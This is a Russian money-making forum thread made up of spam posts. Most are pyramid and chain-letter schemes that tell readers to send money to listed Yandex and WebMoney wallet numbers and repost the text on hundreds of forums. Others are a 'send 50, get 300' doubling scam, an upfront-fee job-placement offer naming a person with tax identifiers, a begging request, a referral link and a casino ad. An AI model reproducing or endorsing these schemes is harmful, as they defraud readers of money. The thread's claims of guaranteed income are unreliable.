Идёт закрытая регистрация Лидеров и их структур полных матриц вход 1000 $ - выход 4000$) Официалный старт 17.12. (вход от 25$)    Спешите быть среди первых
РЕГИСТРАЦИЯ ЗДЕСЬ>>>>

Отредактировано Alexander (2012-12-15 16:20:24)

0

23

Кто хочет заработать читайте внимательно!!! Я Вас уверяю Ваше материальное положение резко улучшится, если Вы этого только захотите!!!!!!! (Понимаю с каким недоверием вы это читаете - но продолжайте, прошу, дочитайте статью до конца). СРАЗУ СКАЖУ, КОГДА ЗАРАБОТАЕТЕ СВОИ ПЕРВЫЕ ТЫСЯЧИ ДВЕ, ПОТРАТЬТЕ ИХ НА РАССКРУТКУ РЕКЛАМЫ ЭТОГО СООБЩЕНИЯ!!! И ВЫ УВИДЕТЕ РЕЗУЛЬТАТ!!! По прошествии всего 2 месяцев, я получил 155 000 руб. И деньги идут каждый день. Каждые 10 минут на мой счёт поступает по 10р. И это все только за цену в 70 руб.!!! Я был в очень плохом экономическом положении и долго не мог найти себе подходящую работу до того, как наткнулся на эту статью. Я не поверил, что это работает, пока не начал получать переводы со всего света… Я купил всё, что мне надо… И это очень кстати, согласитесь!?... Моя работа теперь - это каждый день по 2-3 часа в Интернете и ВСЁ!!!! А заработок такой, что никаким начальникам и руководителям даже и не снился!!! ВОТ ТЕ САМЫЕ 2 ШАГА К УСПЕХУ: 1. Возьмите первый номер кошелька из нижеуказанного списка, отправьте на него 10 руб, вписав этот номер в поле "Номер счёта". В поля "Имя получателя" и "E-mail получателя" вписывать ничего не нужно. В поле "Контракт/назначение платежа" напишите - "Пожалуйста, внесите меня в список Яndex кошельков". Все, что Вы сделали - это создали услугу, и самое главное - абсолютно легально. Вы просите ЗАКОННЫЙ сервис, за который платите. Далее, начиная со второго, по аналогии отправьте по 10 руб. на следующие 7 кошельков (не забудьте вписывать в поле "Контракт/назначение платежа" "Пожалуйста, внесите меня в список Яndex кошельков"): 1) 41001297354413  2) 41001299172898  3) 41001513905363  4) 41001507563134  5) 410011196012060  6) 410011157694570  7)410011714182873 ПОВТОРЯЮ, чтобы получать доход, необходимо отправить НА КАЖДЫЙ из этих 7 кошельков по 10 руб. - иначе, сетевыми модераторами Яndex кошельков, вы просто не будете включены в систему и не сможете обналичить доход. Теперь ВНИМАНИЕ!!! После того, как Вы выполнили ШАГ 2, скопируйте к себе на компьютер весь этот текст от начала до конца (можно в формате txt или ещё как вам удобней). В скопированной статье удалите из списка кошельков ПЕРВЫЙ (ВЕРХНИЙ) кошелёк и переместите 2-ой кошелёк на место 1-го, который Вы стёрли, 3-ий - на место 2-го, 4-ый - на место 3-го, 5-ый - на место 4-го, 6-ой - на место 5-го,7-ой на место 6-го. А в 7-ой номер, который оказался пустым, ВПИШИТЕ НОМЕР Вашего КОШЕЛЬКА!!! 2. Разместите эту статью на НЕ МЕНЕЕ ЧЕМ 200-300 ФОРУМАХ и НОВОСТНЫХ ЛЕНТАХ (News Groups). ЗАПОМНИТЕ: ЧЕМ БОЛЬШЕ вы разместите, ТЕМ ВЫШЕ БУДЕТ ВАШ ДОХОД. И этот доход будет НАПРЯМУЮ ЗАВИСЕТЬ ОТ ВАС. Размещение этой статьи на 200 форумах, даже на самых малопосещаемых, ГАРАНТИРУЕТ Вам доход 150 000 руб. - ЭТО МИНИМУМ!!!, в течение двух месяцев!!! БОЛЬШЕ РАЗМЕЩЕНИЙ - БОЛЬШЕ ДОХОД (при том в ГЕОМЕТРИЧЕСКОЙ ПРОГРЕССИИ). ИТАК, КОГДА ВЫ ДОСТИГНЕТЕ ПЕРВОЙ ПОЗИЦИИ В СПИСКЕ, ВЫ БУДЕТЕ ИМЕТЬ ТЫСЯЧИ РУБЛЕЙ ПРОСТО КАК СОЗДАТЕЛЬ СПИСКА!!! ЭТО СТОИТ 70 рублей и СОВСЕМ НЕ ТРУДНОЙ РАБОТЫ! ГЛАВНОЕ - ЭТО РАБОТАЕТ!!! И ЭТО ПРОСТО ЗДОРОВО!!! ДАВАЙТЕ РИСКНЕМ!! ВЕДЬ НИЧЕГО, КРОМЕ 70РУБЛЕЙ НЕ ТЕРЯЕМ!! А ЕСЛИ ВДРУГ ПОЛУЧИТСЯ!?

0

24

УВАЖАЕМЫЕ АДМИНЫ,НЕ УДАЛЯЙТЕ,ПОЖАЛУЙСТА,ЭТУ ЗАПИСЬ!
Всем привет:D
Наверно вы  слышали про финансовую пирамиду ,в которую вкладываешь 6$,а получаешь 15625$ и больше...Скорей всего уже есть запись и не одна про финансовую пирамиду на этом форуме:)В очередной раз это доказывает,что она работает!Надо лишь следовать одному правилу:БЫТЬ ЧЕСТНЫМ:3
Если этого не сделать,пирамида рухнет ,и все деньги попадут мошенникам в руки!Так вот,я т мои друзья хотим создать финансовую пирамиду,при этом вы можете вложить не 6$,а в 2 раза меньше,то есть 3$...
Итак кто не знает схему этой пирамиды объясняю:
1.Вам нужно Зарегистрироваться на платежной системе Webmoney(Можете и на Яндекс.деньги)
2.Начислить на кошелек 3$, с помощью банковской карты или вы можете заработать деньги на буксах и т.п...
3.Отправляете на каждый из перечисленных кошелек по 0.5$
1.Z198295126804
2.Z204054462930
3.Z337293915662
4.Z277229269598
5.Z636210007893
6.Z392997278655
4.Вместе первого кошелька пишите второй,вместо второго третий и т.д.Свой кошелек пишите на шестом месте.
5.Копируете весь этот текст и пересылаете на 200 и более форумов...
Ну вот  в принципе и все...Каждый день вы будете получать деньги,участвуя в этой финансовой пирамиде!
И ПОМНИТЕ,ТОЛЬКО ЧЕСТНОСТЬ И НИКАКОГО МОШЕННИЧЕСТВА!!!
Удачи,и всем пока:)

0

25

Кто хочет заработать читайте внимательно!!! Я Вас уверяю Ваше материальное положение резко улучшится, если Вы этого только захотите!!!!!!! (Понимаю с каким недоверием вы это читаете - но продолжайте, прошу, дочитайте статью до конца). СРАЗУ СКАЖУ, КОГДА ЗАРАБОТАЕТЕ СВОИ ПЕРВЫЕ ТЫСЯЧИ ДВЕ, ПОТРАТЬТЕ ИХ НА РАССКРУТКУ РЕКЛАМЫ ЭТОГО СООБЩЕНИЯ!!! И ВЫ УВИДЕТЕ РЕЗУЛЬТАТ!!! По прошествии всего 2 месяцев, я получил 155 000 руб. И деньги идут каждый день. Каждые 10 минут на мой счёт поступает по 10р. И это все только за цену в 70 руб.!!! Я был в очень плохом экономическом положении и долго не мог найти себе подходящую работу до того, как наткнулся на эту статью. Я не поверил, что это работает, пока не начал получать переводы со всего света… Я купил всё, что мне надо… И это очень кстати, согласитесь!?... Моя работа теперь - это каждый день по 2-3 часа в Интернете и ВСЁ!!!! А заработок такой, что никаким начальникам и руководителям даже и не снился!!! ВОТ ТЕ САМЫЕ 2 ШАГА К УСПЕХУ: 1. Возьмите первый номер кошелька из нижеуказанного списка, отправьте на него 10 руб, вписав этот номер в поле "Номер счёта". В поля "Имя получателя" и "E-mail получателя" вписывать ничего не нужно. В поле "Контракт/назначение платежа" напишите - "Пожалуйста, внесите меня в список Яndex кошельков". Все, что Вы сделали - это создали услугу, и самое главное - абсолютно легально. Вы просите ЗАКОННЫЙ сервис, за который платите. Далее, начиная со второго, по аналогии отправьте по 10 руб. на следующие 7 кошельков (не забудьте вписывать в поле "Контракт/назначение платежа" "Пожалуйста, внесите меня в список Яndex кошельков"): 1) 41001297354413  2) 41001299172898  3) 41001513905363  4) 41001507563134  5) 410011196012060  6) 410011157694570  7)410011954528877 ПОВТОРЯЮ, чтобы получать доход, необходимо отправить НА КАЖДЫЙ из этих 7 кошельков по 10 руб. - иначе, сетевыми модераторами Яndex кошельков, вы просто не будете включены в систему и не сможете обналичить доход. Теперь ВНИМАНИЕ!!! После того, как Вы выполнили ШАГ 2, скопируйте к себе на компьютер весь этот текст от начала до конца (можно в формате txt или ещё как вам удобней). В скопированной статье удалите из списка кошельков ПЕРВЫЙ (ВЕРХНИЙ) кошелёк и переместите 2-ой кошелёк на место 1-го, который Вы стёрли, 3-ий - на место 2-го, 4-ый - на место 3-го, 5-ый - на место 4-го, 6-ой - на место 5-го,7-ой на место 6-го. А в 7-ой номер, который оказался пустым, ВПИШИТЕ НОМЕР Вашего КОШЕЛЬКА!!! 2. Разместите эту статью на НЕ МЕНЕЕ ЧЕМ 200-300 ФОРУМАХ и НОВОСТНЫХ ЛЕНТАХ (News Groups). ЗАПОМНИТЕ: ЧЕМ БОЛЬШЕ вы разместите, ТЕМ ВЫШЕ БУДЕТ ВАШ ДОХОД. И этот доход будет НАПРЯМУЮ ЗАВИСЕТЬ ОТ ВАС. Размещение этой статьи на 200 форумах, даже на самых малопосещаемых, ГАРАНТИРУЕТ Вам доход 150 000 руб. - ЭТО МИНИМУМ!!!, в течение двух месяцев!!! БОЛЬШЕ РАЗМЕЩЕНИЙ - БОЛЬШЕ ДОХОД (при том в ГЕОМЕТРИЧЕСКОЙ ПРОГРЕССИИ). ИТАК, КОГДА ВЫ ДОСТИГНЕТЕ ПЕРВОЙ ПОЗИЦИИ В СПИСКЕ, ВЫ БУДЕТЕ ИМЕТЬ ТЫСЯЧИ РУБЛЕЙ ПРОСТО КАК СОЗДАТЕЛЬ СПИСКА!!! ЭТО СТОИТ 70 рублей и СОВСЕМ НЕ ТРУДНОЙ РАБОТЫ! ГЛАВНОЕ - ЭТО РАБОТАЕТ!!! И ЭТО ПРОСТО ЗДОРОВО!!! ДАВАЙТЕ РИСКНЕМ!! ВЕДЬ НИЧЕГО, КРОМЕ 70РУБЛЕЙ НЕ ТЕРЯЕМ!! А ЕСЛИ ВДРУГ ПОЛУЧИТСЯ!?

0

26

Я долго искал где можно заработать и нашел пару сайтов, можно реальнонеплохо заработать если работать! Я зарабатываю 10 килорублей, а мой друг около 33 килорублей (задрот)) все найдете на http://realbusiness.glopart.pro/wiki

0

27

ребят помогите насобирать на мотоцикл уже есть 166500 рублей а надо 590000.  !!! я байкер с 8 лет щас 21 но я не как не могу накопить )-: . Пожалуйста кто скок может киньте вот на этот кошелек 410011665058631 буду очень благодарен !! !!!!

0

28

Всем огромный привет и самых наилучших пожеланий! Пусть все ваши мечты сбываются и сбудутся! И В ЭТОМ Я ВАМ ПОМОГУ! Надеюсь всем ну или большенству из Вас! И так для начала я обьясню вам почему вы ни когда не зарабатывали и не получали денежное вознаграждение за работу в интернете. Да потому что все сайты предлагающие работу в интернет это и есть один большой обман! Большинство сайтов а это 99% предлагающие работу и зарабаток, доступных простому обывателю это и есть развод по русски или по европейски как его не назови Вас всё ровно обманывают и кидаю! И вы сами в этом виноваты, что другие а это создатели и администрация сайтов на вас зарабатываю огромные деньги. Вы пашите на кликах, на письмах ищите днями и ночами рефералов зарабатываете копейки, собираете крохотную суммму на вывод который вам обещают и в итоге вы заказываете на вывод свои честно заработанные малые суммы вознаграждений И ВСЁ! Проходит день, два, пять, неделя и ни каких денег вам не поступает! А по чему да по тому что все эти сайты и работадатели не несут ни какой ответственности перед законом и вами, так как вы официально у них не работаете в штате не числитесь и в бюджете компании у них не проходите! Вы для них как "Мёртвые души"! Так за чем же им вам платить, если вы и так пашете на них даром! То что вы регистрируетесь на каком то из сайтов который обещает сразу после регисрации, что вы будете работать ( ну то что вы будете работать и пахать это они вам и правда организуют, а вот получите вы за это хоть что то ЭТО БОЛЬШОЙ ВОПРОС!) и заработаете хорошие деньги ровным счётом ни чего не значит, и ни кого из администрации ни к чему не обязывает. Это то же самое что вы зарегистрировали себе почтовый ящик, да только провайдеру на котором зарегистрирован любой почтовый ящик и то больше доверия чем к любому из сайтов предлагающих работу или зарабаток. Они хоть отвечают за ваши письма и есть куда обратиться с притензиями или проблемой! А все эти буксы, капы, сайты с обещаниями заработков и огромных прибылей, нет ни адресов, ни телефонов, ни службы поддержки, а если даже и есть то ни чего из этого не работает и никто на ваши притензии и жалобы не отвечает! ВЕДЬ ТАК? ПРАВДА! Так за чем вы ведётесь на всё это и тратите свои силы, нервы, время и главное деньги! Обещали все вам зарабаток, а в ИТОГЕ ВЫ ЕЩЁ И СВОИ ДЕНЬГИ ВЛОЖИЛИ И НИ ЧЕГО НЕ ПОЛУЧИЛИ! Ну а про волшебные кошельки я вообще ни чего не буду говорить что бы ни кого не обидеть, те кто на этом уже обжёгся надеюсь уже поняли и не лезут в эту мышеловку за бесплатным сыром. Ну а для тех кто не знает ПРЕДУПРЕЖУ И ПОВТОРЮСЬ "сыр бесплатный бывает только в мышеловке!" НЕ ВЕРЬТЕ и ни чего на эти кошельки не отсылайте! Ведь кто на писал про этот кошелёк того и НОМЕР кошелька в этой статье и указан! Вы просто отдаёте автору этой статьи деньги, ну а он никогда и ни за что вам их не вернёт да ещё вда-три раза больше! И ТАК НАДЕЮСЬ Я ПОНЯТНО ОБЬЯСНИЛ ПОЧЕМУ ВЫ НЕ ЗЫРАБОТАЛИ НИ КОПЕЙКИ В ГЛОБАЛЬНОЙ СЕТИ ИНТЕРНЕТ! ГЛАВНОЕ ПОЧЕМУ ВЫ САМИ ЭТОГО НЕ ПОНИМАЕТЕ И ПО ЧЕМУ НАРОД ПРОДОЛЖАЕТ ВО ВСЁ ЭТО ВЕРИТЬ И РАБОТАТЬ ДАРОМ! ДЛЯ МЕНЯ ЭТО ОСТАЁТСЯ ЗАГАДКОЙ!
!НУ А ТЕПЕРЬ Я РАССКАЖУ ТО ЧТО Я ХОЧУ ПРЕДЛОЖИТЬ ВАМ! И ЧТО БЫ ВЫ ДЕЙСТВИТЕЛЬНО РАБОТАЛИ ЗА РЕАЛЬНЫЕ А НЕ ВИРТУАЛЬНЫЕ ДЕНЬГИ И БЫЛИ УВЕРЕНЫ В СВОЕЙ ЗАРПЛАТЕ, РАБОТЕ И ЗАВТРАШНЕМ ДНЕ!!!!!!!!!
И так меня зовут Ткаченко Степан Владимирович! Всё что я здесь хочу вам предложить это официально и имеет лицензию. Моя деятельность оформлена по всем правам так как я являюсь: ПБОЮЛ Ткаченко Степан Владимирович; ИНН 231302679988; ОГРНИП 304231327900091, свидетельство серия 23 № 003142819 от 05.10.2004г. Если желаете можете проверить для этого и написано!
И так Я и мои помощники проделали колосальную, долгую на протяжении 1,5 лет работу. И теперь плоды этой работы я и хочу вам предложить и поделиться. Я предлагаю вам РАБОТУ В ИНТЕРНЕТЕ НА ДОМУ С ОФИЦИАЛЬНЫМ ТРУДОУСТРОЙСТВОМ по ТК РФ или ДОГОВОРУ НАЙМА НА РАБОТУ!!!
За полтора года я и мои помощники искали и находили и находим по сей день Фирмы, организации, компании, частные, комерчиские и т.д. и заключили с ними договора о помощи по подбору персонала для них. Которые будут выполнять огромный фронт работы для них на дому через интернет, так как это сокращает огромнийшие средства на экономии зданий, аренды или покупки помещений, офисной мебели, компьютерной и орг техники и т.д. Как мы этого добились рассказывать не буду секрет фирмы, скажу одно времени, связей и финансов потрачено огромное колличество. Я предлагаю работу практически любому человеку на территории Российской Федирации, зависит от его места жительства и его желения съездить два раза в офис компании которую он выберет для работы что бы трудоустроиться. Предложения по работе есть в любой области России. В каждой области, крае до пяти больших городов где у нас есть предложения по работе, вы можете жить даже в небольшом городе или посёлке, деревне не важно главное что бы была прописка вашей области или края и возможность или желание съездить в тот город который вы выберите для трудоустройства. Вы можете работать даже по совместительству, даже если у вас уже есть работа но не хватает денег можете просто подрабатывать себе на необходимые для жизни вещи!
Теперь я раскажу вам как всё будет происходить, то есть как вы получите ОФИЦИАЛЬНУЮ РАБОТУ В ИНТЕРНЕТЕ. Так как я уже говорил что было потрачено много сил, времени и финансов, то наши услуги не будут бесплатны. НО НЕ БЕСПОКОЙТЕСЬ НИ КТО С ВАС ТРИ ШКУРЫ ДРАТЬ НЕ БУДЕТ ТЕМ БОЛЕЕ СРАЗУ. ЭТО В ИНТЕРНЕТЕ ВЫ СНАЧАЛА ПЛАТИТЕ И ВАМ ОБЕЩАЮТ ЗОЛОТЫЕ ГОРЫ, И В ИТОГЕ НЕТ НИ ДЕНЕГ НИ ГОР. СНАЧАЛА ВЫ ТРУДОУСТРАИВАЕТЕСЬ ПОЛУЧАЕТЕ РАБОТУ А ПОТОМ УЖЕ Я ПОЛУЧАЮ СВОЁ ВОЗНАГРАЖДЕНИЕ! И так всё по порядку: 1) наверно всех в первую очередь интересует сколько ему обойдётся трудоустройство, от 1200р до 5200р. Это зависит от вашего региона проживания, от выбранной вами работы, от вашей зарплаты. И так идём дальше, вы оплачиваете мне 200р на интернет кошелёк (почему 200 рублей сразу, я обьясню чуть ниже), в графе пояснение платежа указываете свой адрес почтового ящика и Фамилию, Имя, так я буду знать что это именно вы оплатили перевод. Присылаете мне со своего почтового ящика, который был указан в платёжке перевода, письмо. В котором указываете Фамилию, Имя, Область или Край и город (населённый пункт) в котором проживаете, если есть специальность какая то - её тоже напишите, и образование если есть. ОГРОМНАЯ ПРОСЬБА В ПИСЬМЕ ТАК ЖЕ УКАЗЫВАТЬ С КАКОГО ФОРУМА ИЛИ САЙТА В УЗНАЛИ ОБ ОБЬЯВЛЕНИИ! Это мне нужно что бы я смог подобрать вам те варианты которые вам наибольше подойдут. В ответ вы получаете от меня письмо в котором будет пять предложений о работе вашего региона. На звание компании, фирмы их адреса, телефоны, и интернет сайты. Дальше вы связываетесь с компанией по телефону за полняете анкету на их сайте. Вам звонят и назначают день когда вы должны будете к ним подъехать для оформления документов. Трудоустройство 99,9% что вас примут не переживайте я в этом заинтересован ведь ваше трудоустроиство это мои деньги. Почему 99,9%, а в друг война biggrin , но это так шутка! Всю остальную информацию по работе вы получите не посредственно в офисе компании. При оформлении документов у вас спросят откуда узнали о вакансии вы ссылаетесь что информацию получили по интернету от ( ПБОЮЛ Ткаченко Степан Владимирович), и что уже оплатили 200 рублей! И второй раз вам прийдётся к ним подехать (я выше уже упоминал что нужно будет подъехать к ним в офис два раза) это примерно через две недели, получить БАНКОВСКУЮ КАРТУ на которую будет приходить ваш оклад, потому что это ДЕЙСТВИТЕЛЬНО РАБОТА А НЕ ИНТЕРНЕТОВСКИЙ ОБМАН ЗДЕСЬ НЕТ НИ КАКИХ ИНТЕРНЕТ ИЛИ ОНЛАЙН ВЫПЛАТ! РЕАЛЬНАЯ РАБОТА - РЕАЛЬНАЯ ОПЛАТА! И так раз вы устроились и работаете значит вы уже заплатили мне 200р. Теперь поговорим об остальной части моего вознаграждения свои деньги от 1000р до 5000р в зависимости от полученной и выбранной вами вакансии ( ВАЖНО - расценка за вакансию будет указана в письме конкретно за каждую) я автоматически получу с вашей первой зарплаты, она будет удержана с вашего счёта фирмой в мою пользу за оказанные вам услуги в трудоустроистве. !ТОЛЬКО ОДИН РАЗ В РЕВЫЙ МЕСЯЦ! Почему нужно указать в офисе что вы уже оплатили 200 рублей, потому что если вы не укажите это при заполнении анкеты, то сумма удержанная с вашей зарплаты увеличится как раз на сумму в 200р. Пожалуйста не забывайте указывать это в анкете или устном вопросе, что бы потом у нас с вами не было разногласий по этому поводу!
Теперь обьясню почему вы оплачиваете двести рублей сразу! Как и влюбом агенстве или бюро по трудоустроиству вы при обращении оплачиваете услугу не посредственно перед тем как вам выдадут информацию. И у них эта информация стоит гораздо дороже вы и сами это знаете порядка 500 - 1000 рублей. Но и я в итоге беру потом от 1000 до 5000 рублей, скажите вы! Но и я отвечу вам, что в агентстван НЕТ ТОГО ЧТО Я МОГУ ПРЕДЛОЖИТЬ ВАМ!!! И я уже говорил что проделана колосальная очень огромная работа, по сбору и получению информации от компаний работадателей и она уникальна! Если я буду рассылать её бесплатно то многие могут и ЗАХОТЯТ просто получить как можно больше информации о кампаниях, фирмах и организациях работадателей и элементарно заняться плагиатом! А в этот проэкт вложено огромное количестко сил и всевозможных затрат! ПОЭТОМУ НЕТ, ИНФОРМАЦИЯ О РАБОТАДАТЕЛЯХ СТОИТ ХОТЬ И НЕ БОЛЬШИХ НО ДЕНЕГ! И ЭТО СПРАВЕДЛИВО! Хотя можно и так даже по двести рублей собрать плагиатчикам и всяким НЕ ХОРОШИМ людям определённый объём информации о работадателях! Этого не избежать! Но в этом случае я хоть не много компенсирую свои затраты! Поэтому информация о работе стоит своих денег, а трудоустройство своих! Этот проэкт уникален и не имеет ещё аналогов в Российской сети интернет! Но будьте внимательны скоро возможно через 2-3 месяца появятся мои первые плагиатчики которые соберут информацию о моих работадателях, и начнут её рекламировать. Будьте осторожны так как информацию они вам хоть и не большую смогут предоставить, но вот трудоустроить в эти компании они вас не смогут! Повторюсь этот проэкт уникален и я его создал поэтому обьявления такого характера являются настоящими только те которые содержат данные о (ПБОЮЛ Ткаченко Степан Владимирович, e-mail - real-rabota@yandex.ru , и номер yandex кошелька (410011665058631)
Ещё расскажу и обьясню почему все наши с вами действия происходя дистанционно по средству интернет. Так как если открывать во всех регионах нашей страны офисы, а это аренда помещений, оборудование их, трудоустройство людей и их зарплата в данный момент это очень накладно. И если даже всё это организовать то это отразится в первую очередь на самих вас, так как мы будем вынужденны поднять наши расценки за услуги во много раз, что бы хоть как то начать окупаться! Но вбудущем я об этом думаю и планирую! Так что через 2-3 года мы уже откроем большое колличество своих офисов в центральной части России!
Так же ВНИМАНИЕ ответ вам, после оплаты и вашего письма мне ( с указанной о вас необходимой информацией ) поступит вам максимально поздно не больше чем через два дня. Но я приложу все усилия что бы ответ вам поступил как можно быстрей! Так как все заявки и ответ рассматриваются и формируются вручную индивидуально для каждого! И скаждым днём их приходит всё больше и больше! И сами понимаете просто физически ответить всем сразу и моментально нет возможности! На данный момент у нас огромное количество вакансий, но так же каждый день огромное количество и заявок которые с каждым днём всё увеличиваются больше! Поэтому возможные перебои с количеством вакансий, в таких случаях ваша оплата будет вам переведена обратно. И как только появятся подхадящие для вас вакансии и в вашем регионе, вы получите от меня письмо с предложением оплатить услугу, и получить ваши вакансии!
ТАК ЖЕ ВНИМАНИЕ! вы получаете пять предложений по работе на свою почту, но трудоустраиваетесь только по одной. После вашего трудоустройства по одной из них остальные для вас считаются не действительны, и они будут для вас онулированы! Не пытайтесь по ним устроить кого то из ваших родственников, друзей или знакомых не получится! Если кто то из ваших друзей захочет тоже такую работу ему прейдётся так же оплать 200 рублей и отправить свои данные мне, после чего он как и все получит свои вакансии!
В общем это вроде и всё что я хотел вам рассказать, предложить и обьяснить! Но если я что-то забыл или не рассказал, не обьяснил. Или у вас просто возникли свои вопросы! Задавайте, спрашивайте и пишите на адрес real-rabota@yandex.ru я с удовольствием вам помогу, расскажу и обьясню!!!

0

29

410012071155523 удваевает сумму кидаешь 50 рублей и приходит 300

0

30

Если вам нужны деньги, то попробуйте их выиграть в онлайн казино Вулкан , там только лицензионные игровые автоматы с отдачей до 98%, так что у вас есть все шансы на выигрыш.

0


Вы здесь » КАК ЗАРАБОТАТЬ ДЕНЬГИ » Тестовый форум » Кому срочно нужны деньги